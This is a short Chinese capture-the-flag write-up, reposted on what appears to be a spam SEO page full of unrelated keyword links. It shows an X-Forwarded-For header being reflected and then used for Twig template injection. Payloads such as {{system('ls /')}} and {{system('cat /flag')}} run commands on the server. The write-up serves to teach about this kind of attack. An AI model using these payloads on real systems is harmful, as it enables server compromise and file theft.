当前位置: 首页 > news >正文

做网站要学会什么语言今日新闻最新头条10条

做网站要学会什么语言,今日新闻最新头条10条,商务网站建设实训,建设厅注册中心网站考试报名费缴费题解 打开环境点击上面的flag可以看到这个IP页面。 抓个包看看有啥东西无,可以看到在返回包有IP。 看到IP就想到X-Forwarded-For这个玩意,我们用X-Forwarded-For随便添加个IP看看。可以看到返回的IP内容变成了123。 X-Forwarded-For:123 推测它会输出我…

题解

打开环境点击上面的flag可以看到这个IP页面。

抓个包看看有啥东西无,可以看到在返回包有IP。

看到IP就想到X-Forwarded-For这个玩意,我们用X-Forwarded-For随便添加个IP看看。可以看到返回的IP内容变成了123。

X-Forwarded-For:123

推测它会输出我们X-Forwarded-For后面的内容,那么这里涉及一个知识点。就是PHP可能存在Twig模版注入漏洞,啥是Twig模板注入呢,简单来说会执行{{}}里面的内容。比如把123改为{{2+6}},那么就会执行里面的内容,IP处返回的是8。

X-Forwarded-For: {{2+6}}

利用这一点我们可以实现代码执行。

X-Forwarded-For: {{system('ls')}}

查看一下根目录,一般flag都是在这里,发现flag确实在这里。

X-Forwarded-For: {{system('ls /')}}

读取flag。

X-Forwarded-For: {{system('cat /flag')}}

总结

主要涉及的知识点是XFF注入,还有Twig模板注入,通过这题又学到2个新的知识点。这个系列的文章主要是记录一些做过的CTF的题目,以此来记录学过的知识点,俗话说好记性不如烂笔头,希望这系列的文章对我有帮助,也对大家有帮助。

http://www.yidumall.com/news/67272.html

相关文章:

  • 嘉定网站建设公司推广产品的文案
  • 海口网站制作推广企业网站建设方案模板
  • 有哪些做汽配的网站阿里云域名注册流程
  • 网站设计深圳百度竞价排名名词解释
  • 做网站需要多大空间淘宝关键词搜索工具
  • 做汽车团购的网站建设网站服务器ip查询
  • wordpress调用最近发布的文章关系网站优化公司
  • 宁波网站建设软件开发谷歌搜索入口中文
  • 商业设计网站有哪些武汉建站公司
  • 网站开发维护公司网站seo推广多少钱
  • 网站建设需要哪些技术商铺营销推广方案
  • 用易语言做抢购网站软件长沙正规seo优化公司
  • 专门做评测的网站百度极速版推广员怎么申请
  • 爱网站大全aso榜单优化
  • 公司起名查询厦门谷歌seo公司
  • 徐州金网网站建设哈尔滨百度搜索排名优化
  • 流程图制作网站网站建设服务商
  • 网站的架构与建设aso优化排名违法吗
  • 个人性质网站徐州seo顾问
  • 网站怎么能在百度搜到综合查询
  • 网站建设专家今日网站收录查询
  • 网站建设分为哪几个阶段网络整合营销策划书
  • 江西网站建设开发四川网络推广推广机构
  • 品网站建设公司百度seo关键词优化
  • 网站开发和维护微信软文怎么写
  • 腾讯云wed服务器做网站软文云
  • 北京住房城乡建设部网站首页怎么制作小程序
  • 哪个网站做线路攻略做得好湖南网站建设营销推广
  • 连云港建设局官方网站什么文案容易上热门
  • 山东青岛网站制作公司刷移动关键词优化